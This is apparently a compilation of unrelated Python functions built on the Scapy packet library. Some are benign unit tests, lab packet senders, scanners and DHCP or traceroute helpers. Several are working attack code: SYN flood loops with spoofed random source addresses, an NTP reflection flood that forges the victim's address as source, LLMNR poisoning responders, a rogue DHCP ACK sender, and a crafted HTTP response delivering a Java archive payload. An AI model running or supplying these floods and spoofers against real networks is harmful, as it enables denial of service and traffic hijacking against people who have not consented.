def craft_LLMNR_IP(self, packet: Packet) -> Packet: """ This function craft an IP-LLMNR packet. """ name = packet[DNSQR].qname source = packet[IP].src return ( [ IP(ihl=5, proto=17, dst=source) / UDP(sport=5355, dport=packet[UDP].sport) / LLMNRResponse( id=packet[LLMNRQuery].id, qdcount=1, ancount=1, qd=DNSQR(qname=name), an=DNSRR(rrname=name, ttl=30, rdata=self.ip), ) ], source, name, "LLMNR", )
def handle_pkt(pkt): NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00\x01\x00\x24" + "\x00" * 64 if IP in pkt and UDP in pkt and pkt[IP].src != h2_ip: src_mac = pkt[Ether].src dst_mac = pkt[Ether].dst src_ip = pkt[IP].src dst_ip = pkt[IP].dst proto = pkt[IP].proto sport = pkt[UDP].sport dport = pkt[UDP].dport id_tup = (src_ip, dst_ip, proto, sport, dport) if src_ip in VALID_IPS: if id_tup not in totals: totals[id_tup] = 0 totals[id_tup] += 1 print("Received from %s total: %s" % (id_tup, totals[id_tup])) # Respond with random payload p = Ether(dst=src_mac, src=dst_mac) / IP(dst=pkt[IP].src, src=pkt[IP].dst) p = p / UDP(dport=pkt[UDP].sport, sport=123) / NTP(NTP_MONLIST_RESPONSE) print p.show() sendp(p, iface="eth0", loop=0)
def flood(target): IP_Packet = IP() IP_Packet.src = randomData.random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print( f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}" ) else: print( f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}" )
def craft_LLMNR_IP_type_28(self, packet: Packet) -> Packet: """ This function craft an IP-LLMNR packet, type 28. """ name = packet[DNSQR].qname source = packet[IP].src return ( [ IP(ihl=5, proto=17, dst=source) / UDP(sport=5355, dport=packet[UDP].sport) / LLMNRResponse( id=packet[LLMNRQuery].id, qdcount=1, ancount=2, qd=DNSQR(qname=name, qtype=28), an=self.craft_DNSv6_response(name), ) ], source, name, "LLMNR", )
def test_overlapping_segment_out_of_bounds(): """ Basic test for overlapping segments overlapping beyond the edge of the packet. """ fragment = actions.fragment.FragmentAction(correct_order=True) fragment.parse("fragment{tcp:-1:True:20}", logger) packet = layers.packet.Packet( IP(src="127.0.0.1", dst="127.0.0.1") / TCP(seq=100) / ("datadata11datadata")) packet1, packet2 = fragment.run(packet, logger) assert id(packet1) != id(packet2), "Duplicate aliased packet objects" assert packet1["Raw"].load != packet2[ "Raw"].load, "Packets were not different" assert packet1[ "Raw"].load == b'datadata11datadata', "Left packet incorrectly segmented" assert packet2[ "Raw"].load == b"1datadata", "Right packet incorrectly fragmented" assert packet1["TCP"].seq == 100, "First packet sequence number incorrect" assert packet2["TCP"].seq == 109, "Second packet sequence number incorrect"
def test_segment_wrap3(logger): """ Tests if segment numbers can wrap around testing for off-by-one """ fragment = actions.fragment.FragmentAction(correct_order=True) assert str( fragment ) == "fragment{tcp:-1:True}", "Fragment returned incorrect string representation: %s" % str( fragment) packet = layers.packet.Packet( IP(src="127.0.0.1", dst="127.0.0.1") / TCP() / ("data")) packet["TCP"].seq = MAX_UINT - 2 packet1, packet2 = fragment.run(packet, logger) assert id(packet1) != id(packet2), "Duplicate aliased packet objects" assert packet1["Raw"].load != packet2[ "Raw"].load, "Packets were not different" assert packet1["Raw"].load == b'da', "Left packet incorrectly fragmented" assert packet2["Raw"].load == b"ta", "Right packet incorrectly fragmented" assert packet1["TCP"].seq == MAX_UINT - 2 assert packet2["TCP"].seq == MAX_UINT
def testAll(dut): """ test with eth+IPv4+TCP+Payload""" fork(Clock(dut.clk, 6.4, 'ns').start()) dut._log.info("Running test") dut.reset_n.value =0 dut.ethBus.value =0 dut.IPv4Bus.value =0 dut.payload_in_data.value =0 dut.tcpBus.value =0 yield ClockCycles(dut.clk, 10) dut.reset_n.value =1 dut._log.info("end Rst") dut.ethBus.value =int.from_bytes(raw(Ether(src="aa:aa:aa:aa:aa:aa", dst='11:11:11:11:11:11', type="IPv4")), 'little') dut.IPv4Bus.value =int.from_bytes(raw(IP(src="192.168.1.1", dst="192.168.1.2")), 'little') dut.tcpBus.value =int.from_bytes(raw(TCP(sport=80, dport=12000)), 'little') dut.payload_in_data.value =int(0xDEADBEEFDEADBEEF) yield ClockCycles(dut.clk, 15) yield ClockCycles(dut.clk, 1) yield ClockCycles(dut.clk, 15) dut._log.info("end Test")
def cmd_traceroute(ip, port, iface): conf.verb = False if iface: conf.iface = iface pkts = IP(dst=ip, ttl=(1, 16)) / TCP(dport=port) for pkt in pkts: ans = sr1(pkt, timeout=1, iface=conf.iface) if not ans: print('.') continue print(ans.summary()) if TCP in ans and ans[TCP].flags == 18: break return True
def test_single_dns_resp_packet(): packets = [ Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) / DNS(rd=1, qd=DNSQR(qtype="A", qname="google.com"), an=DNSRR(rdata="123.0.0.1")) ] events = list(packets_to_datasource_events(packets).events()) assert len(events) == 1 assert events[0]["src_mac"] == "ab:ab:ab:ab:ab:ab" assert events[0]["dst_mac"] == "12:12:12:12:12:12" assert events[0]["src_ip"] == "127.0.0.1" assert events[0]["dst_ip"] == "192.168.1.1" assert events[0]["sport"] == 80 assert events[0]["dport"] == 53 assert events[0]["qname"] == "google.com." assert events[0]["qanswer"] == "123.0.0.1" assert events[0]["qtype"] == "A" assert events[0]["event_type"] == "DNS"
def test_single_http_packet(): packets = [ Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) / HTTP() / HTTPRequest(Method="GET", Path="/foo", Host="https://google.com") ] events = list(packets_to_datasource_events(packets).events()) assert len(events) == 1 assert events[0]["src_mac"] == "ab:ab:ab:ab:ab:ab" assert events[0]["dst_mac"] == "12:12:12:12:12:12" assert events[0]["src_ip"] == "127.0.0.1" assert events[0]["dst_ip"] == "192.168.1.1" assert events[0]["sport"] == 12345 assert events[0]["dport"] == 80 assert events[0]["http_method"] == "GET" assert events[0]["uri"] == "/foo" assert events[0]["http_dest"] == "https://google.com" assert events[0]["event_type"] == "HTTPRequest"
def main(): src_ip = get_if_addr("eth0") r = redis.Redis(unix_socket_path='/var/run/redis/redis.sock') fmt = src_ip + "*" key = r.keys(fmt) dst_ip_list = [] for i in key: dst_ip_list.append((str.split(i, "+"))[1]) dst_ip_list = set(dst_ip_list) dst_ip = random.sample(dst_ip_list, 1) fmt = src_ip + "+" + dst_ip[0] + "*" key = r.keys(fmt) route_info = random.sample(key, 1) dst_ip, dst_mac, sr = get_route(route_info[0]) iface = get_if() pkt = Ether(src=get_if_hwaddr(iface), dst=dst_mac, type=1792) pkt = pkt / sr / '\x08\x00' / IP(dst=dst_ip) / UDP( dport=1234, sport=random.randint(49152, 65535)) / "777777777" pkt.show2() sendp(pkt, iface=iface, verbose=False)
def craft_discover(self, hw=None): """Generates a DHCPDICSOVER packet Args: hw (str|bytes, optional): Defaults to MAC of Scapy's `conf.iface`. Client MAC address to place in `chaddr`. Returns: scapy.layers.inet.IP: DHCPDISCOVER packet """ if not hw: _, hw = get_if_raw_hwaddr(conf.iface) else: hw = mac_str_to_bytes(hw) dhcp_discover = (IP(src="0.0.0.0", dst="255.255.255.255") / UDP(sport=68, dport=67) / BOOTP(chaddr=hw, xid=self.xid, flags=0x8000) / DHCP(options=[("message-type", "discover"), "end"])) # TODO: param req list if settings.DEBUG: print(dhcp_discover.show()) return dhcp_discover
def start_discovery(host, low=20, high=80): for dport in range(low, high + 1): try: sport = random.randint(100, 999) print(f"pinging..... {host}/[{dport}]|[{sport}]") ack = IP(dst=host) / TCP(sport=sport, dport=dport, flags="S") res = sr1(ack, timeout=1, verbose=0) message = f"HOST: {host} PORT: {dport} || " if res == None: continue elif isRecieved(res): message += "OPEN" close_connection(host, sport, dport) elif isClosed(res): message += "CLOSED" else: message += "FILTERED" print(message) message += ',\n' logs.append(message) except Exception as error: print("[ERROR]" + str(error)) return logs
def _open_connection(self, url, rsport): """ Sends a SYN and waits for the responding SYN/ACK to open the TCP connection. Returns the SYN/ACK response or raises a ICWTestException on error. """ # Try to send SYN try: syn = IP(dst=url) \ / TCP(sport=rsport, dport=80, flags='S', seq=1, options=[('MSS', self.mss)]) except socket.herror: raise ICWTestException(Result.MALFORMED_HOST) except socket.gaierror: raise ICWTestException(Result.BAD_DNS) # Wait for ack ans, _ = sr(syn, timeout=self.ret_timeout, retry=2) if not ans: # TODO: verify that that is what happened here raise ICWTestException(Result.SYN_ACK_TIMEOUT) return ans[0][1]
def run(self): self.opened = {} self.closed = {} mTargets = IP(dst=self.target) if self.sport == 0: self.sport = random.randint(1024, 65535) if self.wizard: self.runAsWizard() for target in mTargets: # for port in self.ports: self.report_ports(target.dst, self.ports) # if self.randomizeWaitTime: # mTime = random.randint(0,float(self.waitTime)) # else: # mTime = float(self.waitTime) # # time.sleep(mTime) return True
def main(argv): try: opts, args = getopt.getopt(sys.argv[1:],'s:e:',['start=','end=']) except getopt.GetoptError: sys.exit(2) for opt, arg in opts: if opt =='-s': start = int(arg) elif opt =='-e': end = int(arg) if start == '': sys.exit() if end == '': sys.exit() interface = popen('ifconfig | awk \'/eth0/ {print $1}\'').read() ip_dst = gendest(start, end) ip_src = sourceIPgen() udp_packets = Ether()/IP(dst=ip_dst, src=ip_src,ttl=18)/UDP(dport=80,sport=2) sendp(udp_packets, iface=interface.rstrip(), inter=0.05) print(repr(udp_packets))
def syn_flood(): global FINISH while True: if FINISH: break IP_Packet = IP() IP_Packet.src = randomData.random_IP() IP_Packet.dst = target_ip TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target_port TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print(e) else: print("\033[1;32m" + "[+]" + "\033[0m" + " SYN packet was sent!")
def ping_sweep(network): # print(type(network)) address_list = [] for ip in network: address_list.append(ip) address_list = address_list[1:-1] # address_list = ["10.0.0.111"] # Testing against a win10 on which I've blocked ICMP traffic for ip in address_list: print("Pinging ",ip,", please wait...") response = sr1( IP(dst=str(ip))/ICMP(), timeout=2, verbose=0 ) print(response) if response == None: print(str(ip) + " is down or unresponsive.") elif response[ICMP].type == 3 and response[ICMP].code == (1 or 2 or 3 or 9 or 10 or 13): # I don't think this is the right syntax, but I'm having trouble finding the right thing print(ip + " is actively blocking ICMP traffic.") else: print(ip + " is reponding")
def generate_packet(self, payload, dst): # Generating the IP layer: ip_layer = IP(src="37.200.69.143", dst=dst) # Generate TCP layer tcp_layer = TCP(sport=80, dport=49451, flags="PA", seq=1, ack=642, options=[('MSS', 1460)]) http_layer = http.HTTP() httpresponse_layer = http.HTTPResponse() httpresponse_layer.__setattr__("Status-Line", 'HTTP/1.1 200 OK') httpresponse_layer.__setattr__("Accept-Ranges", 'bytes') httpresponse_layer.__setattr__("Server", 'nginx/0.7.67') httpresponse_layer.__setattr__("Connection", 'keep-alive') httpresponse_layer.__setattr__("Date", 'Sun, 9 Dec 2018 02:12:00 GMT') httpresponse_layer.__setattr__("Content-Type", 'application/java-archive') httpresponse_layer.__setattr__("Content-Length", '401811') httpresponse_layer.Headers = 'Server: nginx/0.7.67\r\n' \ 'Date: Sun, 16 Nov 2014 02:12:00 GMT\r\n' \ 'Content-Type: application/java-archive\r\n' \ 'Connection: keep-alive\r\n' \ 'Content-Length: 401811\r\n' \ 'X-Powered-By: PHP/5.4.4-14+deb7u14\r\n' \ 'Accept-Ranges: bytes' payload_layer = Raw(payload) packet = ip_layer / tcp_layer / http_layer / httpresponse_layer / payload_layer return packet
def test_bomb_trigger_parse_gas(logger): """ Tests bomb triggers having gas, including changing that gas while in use """ packet = layers.packet.Packet( IP(src="127.0.0.1", dst="127.0.0.1") / TCP(sport=2222, dport=3333, seq=100, ack=100, flags="SA")) # parse a bomb trigger with 1 gas trigger = actions.trigger.Trigger.parse("TCP:flags:SA:-1") assert not trigger.is_applicable(packet, logger) assert trigger.is_applicable(packet, logger) # parse a trigger with no gas left trigger = actions.trigger.Trigger.parse("TCP:flags:SA:0") assert not trigger.is_applicable(packet, logger) trigger = actions.trigger.Trigger.parse("TCP:flags:SA:-1") assert not trigger.is_applicable(packet, logger) # parse a trigger not using gas trigger = actions.trigger.Trigger.parse("TCP:flags:SA") assert trigger.is_applicable(packet, logger) # Check that adding gas while gas is disabled does not work trigger.add_gas(10) assert trigger.gas_remaining == None trigger.enable_gas() trigger.set_gas(2) assert trigger.is_applicable(packet, logger) assert trigger.is_applicable(packet, logger) assert not trigger.is_applicable(packet, logger) # Test that it can handle leading/trailing [] trigger = actions.trigger.Trigger.parse("[TCP:flags:SA]") assert trigger.is_applicable(packet, logger)
def handle_packet(packet): eth = packet.getlayer(Ether) ip = packet.getlayer(IP) udp = packet.getlayer(UDP) bootp = packet.getlayer(BOOTP) dhcp = packet.getlayer(DHCP) dhcp_message_type = None if not dhcp: return False for opt in dhcp.options: if opt[0] == "message-type": dhcp_message_type = opt[1] # dhcp request if dhcp_message_type == 3: client_ip = client_net + str(random.randint(2,254)) dhcp_ack = Ether(src=eth.dst, dst=eth.src) / \ IP(src=dhcpserver, dst=client_ip) / \ UDP(sport=udp.dport, dport=udp.sport) / \ BOOTP(op=2, chaddr=eth.dst, siaddr=gateway, yiaddr=client_ip, xid=bootp.xid) / \ DHCP(options=[('message-type', 5), ('requested_addr', client_ip), ('subnet_mask', '255.255.255.0'), ('router', gateway), ('name_server', nameserver), ('end')]) print("Send spoofed DHCP ACK to %s" % ip.src) sendp(dhcp_ack, iface=dev)
def test_01_route_classified_v4(self): test_packet = Ether( dst='56:0e:37:46:a2:21', src='b6:59:5f:11:c1:2a') / IP( src="10.11.12.13", dst="1.1.1.1") / TCP(sport=45678, dport=80) self.sendp(test_packet, iface=self.IFACE_NAME_PY) packet = self.wait_for_packet( self.eth_tx, lambda packet: isinstance(packet.payload, IP) and packet.payload.dst == '3.4.5.6') assert isinstance(packet, Ether) assert_equals(packet.dst, self.py_side_mac) fou_ip = packet.payload assert isinstance(fou_ip, IP) # Expecting an IP packet assert_equals(fou_ip.src, '65.65.65.65') assert_equals(fou_ip.dst, '3.4.5.6') fou_udp = fou_ip.payload assert isinstance(fou_udp, UDP) # Expecting a FOU packet assert_equals(fou_udp.sport, self.sport_for_packet(test_packet)) assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT) glb_gue = fou_udp.payload assert isinstance( glb_gue, GLBGUE) # Expecting a GUE packet (scapy will always map this) assert_equals(glb_gue.private_data[0].hop_count, 1) assert_equals(glb_gue.private_data[0].next_hop, 0) assert_equals(glb_gue.private_data[0].hops, ['2.3.4.5']) inner_ip = glb_gue.payload assert isinstance(inner_ip, IP) # Expecting the inner IP packet assert_equals(inner_ip.dst, '1.1.1.1') inner_tcp = inner_ip.payload assert isinstance(inner_tcp, TCP) # Expecting the inner TCP packet assert_equals(inner_tcp.dport, 80)
def test_03_icmp_echo_request(self): test_packet = Ether() / IP(src="10.11.12.13", dst="1.1.1.1") / ICMP( type=8, code=0) self.sendp(test_packet, iface=self.IFACE_NAME_PY) packet = self.wait_for_packet( self.eth_tx, lambda packet: isinstance(packet.payload, IP) and packet.payload.dst == '3.4.5.6') assert isinstance(packet, Ether) assert_equals(packet.dst, self.py_side_mac) fou_ip = packet.payload assert isinstance(fou_ip, IP) # Expecting an IP packet assert_equals(fou_ip.src, '65.65.65.65') assert_equals(fou_ip.dst, '3.4.5.6') fou_udp = fou_ip.payload assert isinstance(fou_udp, UDP) # Expecting a FOU packet assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT) glb_gue = fou_udp.payload assert isinstance( glb_gue, GLBGUE) # Expecting a GUE packet (scapy will always map this) assert_equals(glb_gue.private_data[0].hop_count, 1) assert_equals(glb_gue.private_data[0].next_hop, 0) assert_equals(glb_gue.private_data[0].hops, ['2.3.4.5']) inner_ip = glb_gue.payload assert isinstance(inner_ip, IP) # Expecting the inner IP packet assert_equals(inner_ip.src, '10.11.12.13') assert_equals(inner_ip.dst, '1.1.1.1') inner_tcp = inner_ip.payload assert isinstance(inner_tcp, ICMP) # Expecting the inner ICMP packet assert_equals(inner_tcp.type, 8) assert_equals(inner_tcp.code, 0)
def main(): if len(sys.argv) < 2: print 'pass 2 arguments: <destination>' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) while True: print s = str(raw_input('Define Message Type: 3(PUB), 8(SUB), 10(UNSUB) ')) if s == "q": break print pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') try: pkt = pkt / MQTT(message_type=int(s), DUP=0, QoS=0, R=0) except ValueError as e: print '[MQTT]' + e pass s = str(raw_input('Define Topic Type: 0~2^16-1 ')) if s == "q": break print try: pkt = pkt / Topic(topic=int(s), debug=int(0)) except ValueError as e: print '[Topic]' + e pass pkt = pkt / IP(dst=addr) / TCP(dport=4321, sport=1234) pkt.show2() sendp(pkt, iface=iface, verbose=True)
def main(lhost, rhost, rport): """ Completes the three way handshake, then determines what service is available on that port, if any """ try: rport = int(rport) except ValueError: print("{} does not appear to be a valid number.".format(rport)) print("Please change the destination port value and try again.") return source_port = randint(1024, 65535) # Packet[1] SYN ip = IP(src=lhost, dst=rhost) tcp = TCP(sport=source_port, dport=rport, flags='S') syn = ip/tcp # Packet[2] SYN-ACK syn_ack = sr1(syn) replyflag = syn_ack.sprintf("%TCP.flags%") print ("Received TCP Reply flag {}".format(replyflag)) # Packet[3] ACK if replyflag == 'SA': SEQ = syn_ack[TCP].ack ACK = syn_ack[TCP].seq + 1 source_port = syn_ack.dport # The OS may change SPORT tcp = TCP(dport=rport, flags='A', seq=SEQ, ack=ACK, sport=source_port) send(ip/tcp) # Equivalent to the C language function getservbyport() TCP_REVERSE = dict((TCP_SERVICES[k], k) for k in TCP_SERVICES.keys()) print("Port {} is {}".format(rport, TCP_REVERSE[rport]))
def main(): if len(sys.argv) < 4: print 'pass 3 arguments: <op> <keyhash> "<message>" (node, load)' exit(1) op = int(sys.argv[1]) keyhash = int(sys.argv[2]) msg = sys.argv[3] node = 0 load = 0 if len(sys.argv) >= 6: node = int(sys.argv[4]) load = int(sys.argv[5]) dst_ip = server_ip src_ip = client_ip pkt = Ether(src=client_mac, dst=server_mac) pkt = pkt / IP(dst=dst_ip, src=src_ip) pkt = pkt / UDP(dport=12345, sport=random.randint(49152, 65535)) pkt = pkt / Pegasus(op=op, keyhash=keyhash, node=node, load=load) pkt = pkt / msg pkt.show2() sendp(pkt, iface=client_iface, verbose=False)
def main(): if len(sys.argv) < 3: print 'pass 2 arguments: <destination> "<message>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IP(dst=addr, options=IPOption_DRIP( count=0, swtraces=[])) / UDP( dport=4321, sport=1234) / sys.argv[2] #random.randint(49152,65535) for sport pkt.show2() #Wrap this in a repeated loop for how long the timer indicates try: for i in range(int(sys.argv[3])): sendp(pkt, iface=iface) sleep(1) except KeyboardInterrupt: raise
def flood(target): server = random.choice(ntp_servers) # Packet packets = random.randint(10, 150) server = server.replace("\n", "") try: packet = ( IP(dst=server, src=target[0]) / UDP(sport=random.randint(2000, 65535), dport=int(target[1])) / Raw(load=payload)) send(packet, count=packets, verbose=False) except gaierror: print( f"{Fore.RED}[!] {Fore.MAGENTA}NTP server {server} is offline!{Fore.RESET}" ) except Exception as e: print( f"{Fore.MAGENTA}Error while sending NTP packet\n{Fore.MAGENTA}{e}{Fore.RESET}" ) else: print( f"{Fore.GREEN}[+] {Fore.YELLOW}Sending {packets} packets from NTP server {server} to {'{}:{}'.format(*target)}.{Fore.RESET}" )
def main(): if len(sys.argv) < 3: print 'pass 3 arguments: <destination> <dst_tor> <seq_no>' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) with open("attributes.txt") as f: attrList = (line.rstrip() for line in f) attrList = list(line for line in attrList if line) # Non-blank lines for x in attrList: HulappProtocol.add_IntField(x, 0) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP( dst=addr, proto=HULAPP_PROTOCOL) / HulappProtocol( dst_tor=int(sys.argv[2]), seq_no=int(sys.argv[3])) # pkt.show2() ls(pkt) sendp(pkt, iface=iface, verbose=False)
def send_data(server_ip, client_port, client_seq, server_seq, client_isn, example_id, packet_num): if client_seq < client_isn: # SEQ number wraparound offset = client_seq + 2**32 - client_isn - 1 else: offset = client_seq - client_isn - 1 if offset < 0: offset = 0 if offset >= 5: payload = BAD_KEYWORD + '#' + str(example_id) + '#' + str(packet_num) + HTTP_REQ_SUFFIX else: payload = "GET /" + BAD_KEYWORD + '#' + str(example_id) + '#' + str(packet_num) + HTTP_REQ_SUFFIX payload = payload[offset:] data_pkt = IP(dst=server_ip)/TCP(sport=client_port, dport=SERVER_PORT, flags='A', seq=client_seq, ack=server_seq)/Raw(load=payload) data_pkt['IP'].ttl = 163 # to bypass the iptables rule #hexdump(data_pkt) sleep(0.2) send(data_pkt) logger.info("Sent Data packet...") if args.gfw: logger.info("Waiting %ds for server and GFW response..." % GFW_TIME_WAIT_RST) sleep(GFW_TIME_WAIT_RST)